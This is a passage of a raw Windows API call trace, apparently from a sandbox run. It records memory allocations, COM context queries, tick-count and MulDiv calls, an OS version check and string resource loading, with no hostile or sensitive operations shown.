	[0074.399] ??2@YAPEAX_K@Z () returned 0x499380
	[0074.400] ??2@YAPEAX_K@Z () returned 0x49a700
	[0074.400] ??2@YAPEAX_K@Z () returned 0x49a700
	[0074.401] ??2@YAPEAX_K@Z () returned 0x49a730
	[0074.401] ??2@YAPEAX_K@Z () returned 0x49a760
	[0074.402] ??2@YAPEAX_K@Z () returned 0x49a760
	[0074.402] ??2@YAPEAX_K@Z () returned 0x49a790
	[0074.403] ??2@YAPEAX_K@Z () returned 0x49a7c0
	[0074.445] ??2@YAPEAX_K@Z () returned 0x49a7c0
	[0074.445] ??2@YAPEAX_K@Z () returned 0x49a7f0
	[0074.445] ??2@YAPEAX_K@Z () returned 0x49a820
	[0074.446] ??2@YAPEAX_K@Z () returned 0x49a820
	[0074.446] ??2@YAPEAX_K@Z () returned 0x49a850
	[0074.447] ??2@YAPEAX_K@Z () returned 0x49a880
	[0074.447] ??2@YAPEAX_K@Z () returned 0x49a880
	[0074.448] ??2@YAPEAX_K@Z () returned 0x49a8b0
	[0074.448] ??2@YAPEAX_K@Z () returned 0x49a8e0
	[0074.448] ??2@YAPEAX_K@Z () returned 0x49a8e0
	[0074.449] ??2@YAPEAX_K@Z () returned 0x49a910
	[0074.449] ??2@YAPEAX_K@Z () returned 0x49a940
	[0074.450] ??2@YAPEAX_K@Z () returned 0x49a940
	[0074.450] ??2@YAPEAX_K@Z () returned 0x49a970
	[0074.451] ??2@YAPEAX_K@Z () returned 0x49a9a0
	[0074.451] ??2@YAPEAX_K@Z () returned 0x49a9a0
	[0074.452] ??2@YAPEAX_K@Z () returned 0x49a9d0
	[0074.452] ??2@YAPEAX_K@Z () returned 0x49aa00
	[0074.452] ??2@YAPEAX_K@Z () returned 0x49aa00
	[0074.453] ??2@YAPEAX_K@Z () returned 0x49aa30
	[0074.454] ??2@YAPEAX_K@Z () returned 0x49aa60
	[0074.454] ??2@YAPEAX_K@Z () returned 0x49aa60
	[0074.455] ??2@YAPEAX_K@Z () returned 0x49aa90
	[0074.455] ??2@YAPEAX_K@Z () returned 0x49aed0
	[0074.456] ??2@YAPEAX_K@Z () returned 0x49aac0
	[0074.456] ??2@YAPEAX_K@Z () returned 0x49aac0
	[0074.457] ??2@YAPEAX_K@Z () returned 0x49aaf0
	[0074.457] ??2@YAPEAX_K@Z () returned 0x49ab20
	[0074.457] ??2@YAPEAX_K@Z () returned 0x49ab20
	[0074.458] ??2@YAPEAX_K@Z () returned 0x49ab50
	[0074.458] CoGetObjectContext (in: riid=0x7fedf566350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1f9548 | out: ppv=0x1f9548*=0x39f420) returned 0x0
	[0074.460] ??3@YAXPEAX@Z () returned 0x1
	[0074.460] ??3@YAXPEAX@Z () returned 0xb00500001
	[0074.460] ??3@YAXPEAX@Z () returned 0xc004d0001
	[0074.460] ??3@YAXPEAX@Z () returned 0xd004a0001
	[0074.460] ??3@YAXPEAX@Z () returned 0xe00470001
	[0074.460] ??3@YAXPEAX@Z () returned 0xf00440001
	[0074.460] ??3@YAXPEAX@Z () returned 0x1000410001
	[0074.460] ??3@YAXPEAX@Z () returned 0x11003e0001
	[0074.460] ??3@YAXPEAX@Z () returned 0x12003b0001
	[0074.461] ??3@YAXPEAX@Z () returned 0x1300380001
	[0074.461] ??3@YAXPEAX@Z () returned 0x1400350001
	[0074.461] ??3@YAXPEAX@Z () returned 0x1500320001
	[0074.461] ??3@YAXPEAX@Z () returned 0x16002f0001
	[0074.461] ??3@YAXPEAX@Z () returned 0x17002c0001
	[0074.461] ??3@YAXPEAX@Z () returned 0x1800290001
	[0074.461] ??3@YAXPEAX@Z () returned 0x1900260001
	[0074.461] ??3@YAXPEAX@Z () returned 0x1a00230001
	[0074.461] ??3@YAXPEAX@Z () returned 0x1b00200001
	[0074.461] ??3@YAXPEAX@Z () returned 0x1c001d0001
	[0074.461] ??3@YAXPEAX@Z () returned 0x1d001a0001
	[0074.461] ??3@YAXPEAX@Z () returned 0x1e00170001
	[0074.461] ??3@YAXPEAX@Z () returned 0x1f00140001
	[0074.461] ??3@YAXPEAX@Z () returned 0x2000110001
	[0074.462] ??3@YAXPEAX@Z () returned 0x21000e0001
	[0074.462] ??3@YAXPEAX@Z () returned 0x1
	[0074.462] ??3@YAXPEAX@Z () returned 0x200200001
	[0074.462] ??3@YAXPEAX@Z () returned 0x3001d0001
	[0074.462] ??3@YAXPEAX@Z () returned 0x22000b0001
	[0074.462] ??3@YAXPEAX@Z () returned 0x4001a0001
	[0074.462] ??3@YAXPEAX@Z () returned 0x500170001
	[0074.462] ??3@YAXPEAX@Z () returned 0x2300080001
	[0074.462] ??3@YAXPEAX@Z () returned 0x600140001
	[0074.462] ??3@YAXPEAX@Z () returned 0x700110001
	[0074.462] ??3@YAXPEAX@Z () returned 0x2400050001
	[0074.462] ??3@YAXPEAX@Z () returned 0x8000e0001
	[0074.462] ??3@YAXPEAX@Z () returned 0x9000b0001
	[0074.462] ??3@YAXPEAX@Z () returned 0xa00080001
	[0074.462] ??3@YAXPEAX@Z () returned 0xb00050001
	[0074.462] ??3@YAXPEAX@Z () returned 0xc007a0001
	[0074.465] MulDiv (nNumber=491, nNumerator=100, nDenominator=917) returned 54
	[0074.465] IUnknown:Release (This=0x39f420) returned 0x1
	[0074.465] GetTickCount () returned 0x23523
	[0074.466] ??2@YAPEAX_K@Z () returned 0x497a80
	[0074.466] ??2@YAPEAX_K@Z () returned 0x497a80
	[0074.467] ??2@YAPEAX_K@Z () returned 0x497ab0
	[0074.467] ??2@YAPEAX_K@Z () returned 0x497ae0
	[0074.468] ??2@YAPEAX_K@Z () returned 0x497ae0
	[0074.468] ??2@YAPEAX_K@Z () returned 0x497b10
	[0074.469] ??2@YAPEAX_K@Z () returned 0x497b40
	[0074.469] ??2@YAPEAX_K@Z () returned 0x497b40
	[0074.469] ??2@YAPEAX_K@Z () returned 0x497b70
	[0074.470] ??2@YAPEAX_K@Z () returned 0x497ba0
	[0074.470] ??2@YAPEAX_K@Z () returned 0x497ba0
	[0074.471] ??2@YAPEAX_K@Z () returned 0x497bd0
	[0074.471] ??2@YAPEAX_K@Z () returned 0x497c00
	[0074.472] ??2@YAPEAX_K@Z () returned 0x497c00
	[0074.472] ??2@YAPEAX_K@Z () returned 0x497c30
	[0074.473] ??2@YAPEAX_K@Z () returned 0x497c60
	[0074.473] ??2@YAPEAX_K@Z () returned 0x497c60
	[0074.474] ??2@YAPEAX_K@Z () returned 0x497c90
	[0074.474] ??2@YAPEAX_K@Z () returned 0x497cc0
	[0074.475] ??2@YAPEAX_K@Z () returned 0x497cc0
	[0074.475] ??2@YAPEAX_K@Z () returned 0x497cf0
	[0074.476] ??2@YAPEAX_K@Z () returned 0x497d20
	[0074.476] ??2@YAPEAX_K@Z () returned 0x497d20
	[0074.477] ??2@YAPEAX_K@Z () returned 0x497d50
	[0074.477] ??2@YAPEAX_K@Z () returned 0x497d80
	[0074.477] ??2@YAPEAX_K@Z () returned 0x497d80
	[0074.478] ??2@YAPEAX_K@Z () returned 0x497db0
	[0074.521] ??2@YAPEAX_K@Z () returned 0x497de0
	[0074.521] ??2@YAPEAX_K@Z () returned 0x497de0
	[0074.521] ??2@YAPEAX_K@Z () returned 0x497e10
	[0074.522] ??2@YAPEAX_K@Z () returned 0x497e40
	[0074.522] ??2@YAPEAX_K@Z () returned 0x497e40
	[0074.523] ??2@YAPEAX_K@Z () returned 0x497e70
	[0074.524] ??2@YAPEAX_K@Z () returned 0x497ea0
	[0074.524] ??2@YAPEAX_K@Z () returned 0x497ea0
	[0074.524] ??2@YAPEAX_K@Z () returned 0x497ed0
	[0074.525] ??2@YAPEAX_K@Z () returned 0x497f00
	[0074.525] ??2@YAPEAX_K@Z () returned 0x497f00
	[0074.526] ??2@YAPEAX_K@Z () returned 0x497f30
	[0074.526] ??2@YAPEAX_K@Z () returned 0x497f60
	[0074.527] ??2@YAPEAX_K@Z () returned 0x497f60
	[0074.527] ??2@YAPEAX_K@Z () returned 0x49ab80
	[0074.528] ??2@YAPEAX_K@Z () returned 0x49abb0
	[0074.528] ??2@YAPEAX_K@Z () returned 0x49abb0
	[0074.528] ??2@YAPEAX_K@Z () returned 0x49abe0
	[0074.529] ??2@YAPEAX_K@Z () returned 0x49ac10
	[0074.529] ??2@YAPEAX_K@Z () returned 0x49ac10
	[0074.530] ??2@YAPEAX_K@Z () returned 0x49ac40
	[0074.530] ??2@YAPEAX_K@Z () returned 0x49ac70
	[0074.531] ??2@YAPEAX_K@Z () returned 0x49ac70
	[0074.531] ??2@YAPEAX_K@Z () returned 0x49aca0
	[0074.532] ??2@YAPEAX_K@Z () returned 0x49acd0
	[0074.532] ??2@YAPEAX_K@Z () returned 0x49acd0
	[0074.532] ??2@YAPEAX_K@Z () returned 0x49ad00
	[0074.533] ??2@YAPEAX_K@Z () returned 0x49ad30
	[0074.534] ??2@YAPEAX_K@Z () returned 0x49ad30
	[0074.534] ??2@YAPEAX_K@Z () returned 0x49ad60
	[0074.535] ??2@YAPEAX_K@Z () returned 0x49ad90
	[0074.535] ??2@YAPEAX_K@Z () returned 0x49ad90
	[0074.535] ??2@YAPEAX_K@Z () returned 0x49adc0
	[0074.538] CoGetObjectContext (in: riid=0x7fedf566350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1f9548 | out: ppv=0x1f9548*=0x39f420) returned 0x0
	[0074.539] MulDiv (nNumber=256, nNumerator=100, nDenominator=938) returned 27
	[0074.539] IUnknown:Release (This=0x39f420) returned 0x1
	[0074.539] GetTickCount () returned 0x23571
	[0074.541] realloc (_Block=0x0, _Size=0xc8) returned 0x491420
	[0074.730] ??2@YAPEAX_K@Z () returned 0x4a3be0
	[0074.732] ??2@YAPEAX_K@Z () returned 0x492fa0
	[0074.732] malloc (_Size=0x80) returned 0x494b30
	[0074.732] malloc (_Size=0x108) returned 0x2b8930
	[0074.734] ??2@YAPEAX_K@Z () returned 0x4d0a20
	[0074.735] realloc (_Block=0x0, _Size=0x64) returned 0x490b20
	[0074.736] realloc (_Block=0x0, _Size=0x27c) returned 0x49cae0
	[0074.736] free (_Block=0x490b20) 
	[0074.737] ??2@YAPEAX_K@Z () returned 0x4a4d60
	[0074.738] CoGetObjectContext (in: riid=0x7fedf566350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1f77b8 | out: ppv=0x1f77b8*=0x39f420) returned 0x0
	[0074.739] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0074.739] ??3@YAXPEAX@Z () returned 0x1
	[0074.739] ??3@YAXPEAX@Z () returned 0x1900050001
	[0074.740] ??3@YAXPEAX@Z () returned 0x3400200001
	[0074.741] free (_Block=0x49ffc0) 
	[0074.741] free (_Block=0x495540) 
	[0074.741] free (_Block=0x4a13d0) 
	[0074.741] free (_Block=0x49ebb0) 
	[0074.742] free (_Block=0x49d790) 
	[0074.742] free (_Block=0x49cd70) 
	[0074.742] free (_Block=0x49c850) 
	[0074.742] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0074.742] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0074.742] ??3@YAXPEAX@Z () returned 0x59000b0001
	[0074.743] free (_Block=0x4d1530) 
	[0074.743] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0074.743] MulDiv (nNumber=669, nNumerator=100, nDenominator=1194) returned 56
	[0074.743] IUnknown:Release (This=0x39f420) returned 0x1
	[0074.743] GetTickCount () returned 0x2363c
	[0074.744] ??2@YAPEAX_K@Z () returned 0x49ba60
	[0074.744] CoGetObjectContext (in: riid=0x7fedf566350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1f9548 | out: ppv=0x1f9548*=0x39f420) returned 0x0
	[0074.745] MulDiv (nNumber=470, nNumerator=100, nDenominator=1042) returned 45
	[0074.745] IUnknown:Release (This=0x39f420) returned 0x1
	[0074.745] GetTickCount () returned 0x2363c
	[0074.746] CoGetObjectContext (in: riid=0x7fedf566350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1f9548 | out: ppv=0x1f9548*=0x39f420) returned 0x0
	[0074.747] MulDiv (nNumber=256, nNumerator=100, nDenominator=1084) returned 24
	[0074.747] IUnknown:Release (This=0x39f420) returned 0x1
	[0074.747] GetTickCount () returned 0x2363c
	[0074.750] ??2@YAPEAX_K@Z () returned 0x4a3830
	[0074.751] ??2@YAPEAX_K@Z () returned 0x4911a0
	[0074.753] realloc (_Block=0x0, _Size=0x64) returned 0x490b20
	[0074.753] realloc (_Block=0x0, _Size=0xc8) returned 0x4d2700
	[0074.754] free (_Block=0x490b20) 
	[0074.755] ??2@YAPEAX_K@Z () returned 0x4a9b00
	[0074.841] ??2@YAPEAX_K@Z () returned 0x4aa750
	[0074.842] ??2@YAPEAX_K@Z () returned 0x490b20
	[0074.844] MulDiv (nNumber=723, nNumerator=100, nDenominator=1341) returned 54
	[0074.844] IUnknown:Release (This=0x39f420) returned 0x1
	[0074.844] GetTickCount () returned 0x236a9
	[0074.847] malloc (_Size=0x208) returned 0x4d2cf0
	[0074.848] ??2@YAPEAX_K@Z () returned 0x4a47d0
	[0074.849] ??2@YAPEAX_K@Z () returned 0x4d0a20
	[0074.852] ??2@YAPEAX_K@Z () returned 0x4aa9f0
	[0074.853] ??2@YAPEAX_K@Z () returned 0x4911a0
	[0074.854] MulDiv (nNumber=369, nNumerator=100, nDenominator=1130) returned 33
	[0074.854] IUnknown:Release (This=0x39f420) returned 0x1
	[0074.854] GetTickCount () returned 0x236a9
	[0074.855] MulDiv (nNumber=461, nNumerator=100, nDenominator=1275) returned 36
	[0074.855] IUnknown:Release (This=0x39f420) returned 0x1
	[0074.855] GetTickCount () returned 0x236a9
	[0074.856] MulDiv (nNumber=256, nNumerator=100, nDenominator=1326) returned 19
	[0074.856] IUnknown:Release (This=0x39f420) returned 0x1
	[0074.856] GetTickCount () returned 0x236a9
	[0074.858] ??2@YAPEAX_K@Z () returned 0x4a2df0
	[0074.859] ??2@YAPEAX_K@Z () returned 0x4d0a20
	[0074.861] MulDiv (nNumber=695, nNumerator=100, nDenominator=1583) returned 44
	[0074.861] IUnknown:Release (This=0x39f420) returned 0x1
	[0074.861] GetTickCount () returned 0x236b8
	[0074.862] ??2@YAPEAX_K@Z () returned 0x495b40
	[0074.864] ??2@YAPEAX_K@Z () returned 0x4911a0
	[0074.865] MulDiv (nNumber=550, nNumerator=100, nDenominator=1402) returned 39
	[0074.865] IUnknown:Release (This=0x39f420) returned 0x1
	[0074.865] GetTickCount () returned 0x236b8
	[0074.866] MulDiv (nNumber=256, nNumerator=100, nDenominator=1364) returned 19
	[0074.866] IUnknown:Release (This=0x39f420) returned 0x1
	[0074.866] GetTickCount () returned 0x236b8
	[0074.867] ??2@YAPEAX_K@Z () returned 0x49bf10
	[0074.869] ??2@YAPEAX_K@Z () returned 0x4d0a20
	[0074.870] MulDiv (nNumber=604, nNumerator=100, nDenominator=1620) returned 37
	[0074.870] IUnknown:Release (This=0x39f420) returned 0x1
	[0074.870] GetTickCount () returned 0x236b8
	[0074.872] ??2@YAPEAX_K@Z () returned 0x4a4b90
	[0074.982] ??2@YAPEAX_K@Z () returned 0x4911a0
	[0074.985] ??2@YAPEAX_K@Z () returned 0x4aa900
	[0074.986] ??2@YAPEAX_K@Z () returned 0x490b20
	[0074.987] MulDiv (nNumber=489, nNumerator=100, nDenominator=1535) returned 32
	[0074.987] IUnknown:Release (This=0x39f420) returned 0x1
	[0074.987] GetTickCount () returned 0x23726
	[0074.988] malloc (_Size=0x408) returned 0x4b2c80
	[0074.988] realloc (_Block=0x0, _Size=0xa0) returned 0x493050
	[0074.989] ??2@YAPEAX_K@Z () returned 0x4aaa80
	[0074.990] ??2@YAPEAX_K@Z () returned 0x4911a0
	[0074.992] MulDiv (nNumber=425, nNumerator=100, nDenominator=1559) returned 27
	[0074.992] IUnknown:Release (This=0x39f420) returned 0x1
	[0074.992] GetTickCount () returned 0x23726
	[0074.993] ??2@YAPEAX_K@Z () returned 0x49c0b0
	[0074.995] ??2@YAPEAX_K@Z () returned 0x4d0a20
	[0074.996] MulDiv (nNumber=494, nNumerator=100, nDenominator=1646) returned 30
	[0074.996] IUnknown:Release (This=0x39f420) returned 0x1
	[0074.996] GetTickCount () returned 0x23726
	[0074.998] ??2@YAPEAX_K@Z () returned 0x4a8950
	[0074.999] ??2@YAPEAX_K@Z () returned 0x4911a0
	[0075.002] ??2@YAPEAX_K@Z () returned 0x4a30c0
	[0075.003] ??2@YAPEAX_K@Z () returned 0x490b20
	[0075.005] MulDiv (nNumber=494, nNumerator=100, nDenominator=1665) returned 30
	[0075.005] IUnknown:Release (This=0x39f420) returned 0x1
	[0075.005] GetTickCount () returned 0x23735
	[0075.007] ??2@YAPEAX_K@Z () returned 0x4a48f0
	[0075.008] ??2@YAPEAX_K@Z () returned 0x4911a0
	[0075.010] ??2@YAPEAX_K@Z () returned 0x4a8b30
	[0075.011] GetVersionExA (in: lpVersionInformation=0x1fc840*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x2b12f0, dwBuildNumber=0x0, dwPlatformId=0x39e198, szCSDVersion="") | out: lpVersionInformation=0x1fc840*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0075.011] FindResourceA (hModule=0x7fedf4c0000, lpName=0x139, lpType=0x6) returned 0x2a07f8
	[0075.012] LoadResource (hModule=0x7fedf4c0000, hResInfo=0x2a07f8) returned 0x2a1d44
	[0075.012] LockResource (hResData=0x2a1d44) returned 0x2a1d44
	[0075.012] SizeofResource (hModule=0x7fedf4c0000, hResInfo=0x2a07f8) returned 0x15c
	[0075.012] FreeResource (hResData=0x2a1d44) returned 0
	[0075.012] FindResourceA (hModule=0x7fedf4c0000, lpName=0x101, lpType=0x6) returned 0x2a07e8
	[0075.012] LoadResource (hModule=0x7fedf4c0000, hResInfo=0x2a07e8) returned 0x2a1c74
	[0075.012] LockResource (hResData=0x2a1c74) returned 0x2a1c74
	[0075.012] SizeofResource (hModule=0x7fedf4c0000, hResInfo=0x2a07e8) returned 0xce
	[0075.013] FreeResource (hResData=0x2a1c74) returned 0
	[0075.013] bsearch (_Key=0x1fd1d8, _Base=0x7fedf58a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fedf5181a0) returned 0x7fedf58a5a8
	[0075.013] ??2@YAPEAX_K@Z () returned 0x4d0a20
	[0075.096] ??2@YAPEAX_K@Z () returned 0x49dfb0
	[0075.097] MulDiv (nNumber=363, nNumerator=100, nDenominator=1688) returned 22
	[0075.097] IUnknown:Release (This=0x39f420) returned 0x1
	[0075.097] GetTickCount () returned 0x23793
	[0075.100] ??2@YAPEAX_K@Z () returned 0x4911a0
	[0075.103] ??2@YAPEAX_K@Z () returned 0x49cb20
	[0075.104] ??2@YAPEAX_K@Z () returned 0x490b20
	[0075.106] MulDiv (nNumber=446, nNumerator=100, nDenominator=1837) returned 24
	[0075.106] IUnknown:Release (This=0x39f420) returned 0x1
	[0075.106] GetTickCount () returned 0x23793
	[0075.107] MulDiv (nNumber=560, nNumerator=100, nDenominator=1904) returned 29
	[0075.107] IUnknown:Release (This=0x39f420) returned 0x1
	[0075.107] GetTickCount () returned 0x237a2
	[0075.108] MulDiv (nNumber=256, nNumerator=100, nDenominator=1856) returned 14
	[0075.108] IUnknown:Release (This=0x39f420) returned 0x1
	[0075.108] GetTickCount () returned 0x237a2
	[0075.110] ??2@YAPEAX_K@Z () returned 0x4bbee0
	[0075.111] ??2@YAPEAX_K@Z () returned 0x4911a0
	[0075.114] ??2@YAPEAX_K@Z () returned 0x4bcb50
	[0075.115] ??2@YAPEAX_K@Z () returned 0x491ef0
	[0075.115] GetTickCount () returned 0x237a2
	[0075.115] CoGetObjectContext (in: riid=0x7fedf566350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1f9548 | out: ppv=0x1f9548*=0x39f420) returned 0x0
	[0075.118] realloc (_Block=0x493050, _Size=0x140) returned 0x4a5710
	[0075.118] ??2@YAPEAX_K@Z () returned 0x4a8e60
	[0075.120] ??2@YAPEAX_K@Z () returned 0x4911a0
	[0075.120] GetTickCount () returned 0x237a2
	[0075.120] CoGetObjectContext (in: riid=0x7fedf566350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1f9548 | out: ppv=0x1f9548*=0x39f420) returned 0x0
	[0075.123] ??2@YAPEAX_K@Z () returned 0x518150
	[0075.124] ??2@YAPEAX_K@Z () returned 0x490b20
	[0075.124] GetTickCount () returned 0x237b2
	[0075.124] CoGetObjectContext (in: riid=0x7fedf566350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1f9548 | out: ppv=0x1f9548*=0x39f420) returned 0x0
	[0075.124] free (_Block=0x4e4410) 
	[0075.124] free (_Block=0x503210) 
	[0075.124] free (_Block=0x4b3f10) 
	[0075.124] free (_Block=0x4e3000) 
	[0075.124] free (_Block=0x4d3000) 
	[0075.124] free (_Block=0x4aacb0) 
	[0075.124] free (_Block=0x49e9d0) 
	[0075.124] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0075.124] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0075.127] ??2@YAPEAX_K@Z () returned 0x518390
	[0075.128] ??2@YAPEAX_K@Z () returned 0x4911a0
	[0075.131] ??2@YAPEAX_K@Z () returned 0x519630
	[0075.132] ??2@YAPEAX_K@Z () returned 0x495540
	[0075.132] GetTickCount () returned 0x237b2
	[0075.132] CoGetObjectContext (in: riid=0x7fedf566350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1f9548 | out: ppv=0x1f9548*=0x39f420) returned 0x0
	[0075.133] free (_Block=0x4e4410) 
	[0075.133] free (_Block=0x503210) 
	[0075.133] free (_Block=0x4b3f10) 
	[0075.133] free (_Block=0x4e3000) 
	[0075.133] free (_Block=0x4d3000) 
	[0075.133] free (_Block=0x4aacb0) 
	[0075.133] free (_Block=0x49e9d0) 
	[0075.133] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0075.133] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0075.135] malloc (_Size=0x808) returned 0x4bcf20
	[0075.135] ??2@YAPEAX_K@Z () returned 0x519900
	[0075.137] ??2@YAPEAX_K@Z () returned 0x4911a0
	[0075.219] ??2@YAPEAX_K@Z () returned 0x518870
	[0075.220] ??2@YAPEAX_K@Z () returned 0x490b20
	[0075.224] ??2@YAPEAX_K@Z () returned 0x507060
	[0075.225] ??2@YAPEAX_K@Z () returned 0x4bd730
	[0075.225] GetTickCount () returned 0x23810
	[0075.225] CoGetObjectContext (in: riid=0x7fedf566350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1f9548 | out: ppv=0x1f9548*=0x39f420) returned 0x0
	[0075.228] ??2@YAPEAX_K@Z () returned 0x4bc040
	[0075.229] ??2@YAPEAX_K@Z () returned 0x4911a0
	[0075.232] ??2@YAPEAX_K@Z () returned 0x4bc880
	[0075.233] ??2@YAPEAX_K@Z () returned 0x490b20
	[0075.236] ??2@YAPEAX_K@Z () returned 0x518930
	[0075.237] ??2@YAPEAX_K@Z () returned 0x4bd7b0
	[0075.237] GetTickCount () returned 0x2381f
	[0075.237] CoGetObjectContext (in: riid=0x7fedf566350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1f9548 | out: ppv=0x1f9548*=0x39f420) returned 0x0
	[0075.237] free (_Block=0x4e4410) 
	[0075.237] free (_Block=0x503210) 
	[0075.237] free (_Block=0x4b3f10) 
	[0075.237] free (_Block=0x4e3000) 
	[0075.237] free (_Block=0x4d3000) 
	[0075.237] free (_Block=0x4aacb0) 
	[0075.237] free (_Block=0x49e9d0) 
	[0075.237] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0075.237] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0075.240] ??2@YAPEAX_K@Z () returned 0x4a8ef0
	[0075.242] ??2@YAPEAX_K@Z () returned 0x4911a0
	[0075.242] GetTickCount () returned 0x2381f
	[0075.242] CoGetObjectContext (in: riid=0x7fedf566350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1f9548 | out: ppv=0x1f9548*=0x39f420) returned 0x0
	[0075.244] MulDiv (nNumber=756, nNumerator=100, nDenominator=3006) returned 25
	[0075.244] IUnknown:Release (This=0x39f420) returned 0x1
	[0075.244] GetTickCount () returned 0x2381f
	[0075.246] ??2@YAPEAX_K@Z () returned 0x496ff0
	[0075.247] ??2@YAPEAX_K@Z () returned 0x490b20
	[0075.250] ??2@YAPEAX_K@Z () returned 0x51ce10
	[0075.251] ??2@YAPEAX_K@Z () returned 0x4bd730
	[0075.253] MulDiv (nNumber=1142, nNumerator=100, nDenominator=3532) returned 32
	[0075.253] IUnknown:Release (This=0x39f420) returned 0x1
	[0075.253] GetTickCount () returned 0x2382f
	[0075.255] ??2@YAPEAX_K@Z () returned 0x522680
	[0075.256] ??2@YAPEAX_K@Z () returned 0x4911a0
	[0075.258] ??2@YAPEAX_K@Z () returned 0x523280
	[0075.260] ??2@YAPEAX_K@Z () returned 0x490b20
	[0075.263] ??2@YAPEAX_K@Z () returned 0x4bd7b0
	[0075.411] ??2@YAPEAX_K@Z () returned 0x49dfb0
	[0075.415] ??2@YAPEAX_K@Z () returned 0x4911a0
	[0075.419] ??2@YAPEAX_K@Z () returned 0x4bd730
	[0075.426] MulDiv (nNumber=941, nNumerator=100, nDenominator=3335) returned 28
	[0075.426] IUnknown:Release (This=0x39f420) returned 0x1
	[0075.426] GetTickCount () returned 0x238da
	[0075.429] MulDiv (nNumber=985, nNumerator=100, nDenominator=3412) returned 29
	[0075.429] IUnknown:Release (This=0x39f420) returned 0x1
	[0075.429] GetTickCount () returned 0x238da
	[0075.434] MulDiv (nNumber=997, nNumerator=100, nDenominator=3476) returned 29
	[0075.434] IUnknown:Release (This=0x39f420) returned 0x1
	[0075.434] GetTickCount () returned 0x238da
	[0075.438] MulDiv (nNumber=1016, nNumerator=100, nDenominator=3496) returned 29
	[0075.438] IUnknown:Release (This=0x39f420) returned 0x1
	[0075.438] GetTickCount () returned 0x238ea
	[0075.440] MulDiv (nNumber=1128, nNumerator=100, nDenominator=3607) returned 31
	[0075.440] IUnknown:Release (This=0x39f420) returned 0x1
	[0075.440] GetTickCount () returned 0x238ea
	[0075.443] MulDiv (nNumber=984, nNumerator=100, nDenominator=3525) returned 28
	[0075.443] IUnknown:Release (This=0x39f420) returned 0x1
	[0075.443] GetTickCount () returned 0x238ea
	[0075.447] MulDiv (nNumber=980, nNumerator=100, nDenominator=3576) returned 27
	[0075.447] IUnknown:Release (This=0x39f420) returned 0x1
	[0075.447] GetTickCount () returned 0x238ea
	[0075.450] MulDiv (nNumber=979, nNumerator=100, nDenominator=3636) returned 27
	[0075.450] IUnknown:Release (This=0x39f420) returned 0x1
	[0075.450] GetTickCount () returned 0x238ea
	[0075.573] MulDiv (nNumber=990, nNumerator=100, nDenominator=3729) returned 27
	[0075.573] IUnknown:Release (This=0x39f420) returned 0x1
	[0075.573] GetTickCount () returned 0x23967
	[0075.577] MulDiv (nNumber=1186, nNumerator=100, nDenominator=3760) returned 32
	[0075.577] IUnknown:Release (This=0x39f420) returned 0x1
	[0075.577] GetTickCount () returned 0x23976
	[0075.580] MulDiv (nNumber=969, nNumerator=100, nDenominator=3591) returned 27
	[0075.580] IUnknown:Release (This=0x39f420) returned 0x1
	[0075.580] GetTickCount () returned 0x23976
	[0075.584] MulDiv (nNumber=1015, nNumerator=100, nDenominator=3620) returned 28
	[0075.584] IUnknown:Release (This=0x39f420) returned 0x1
	[0075.584] GetTickCount () returned 0x23976
	[0075.596] MulDiv (nNumber=958, nNumerator=100, nDenominator=3645) returned 26
	[0075.596] IUnknown:Release (This=0x39f420) returned 0x1
	[0075.596] GetTickCount () returned 0x23986
	[0075.727] _resetstkoflw () returned 0x1
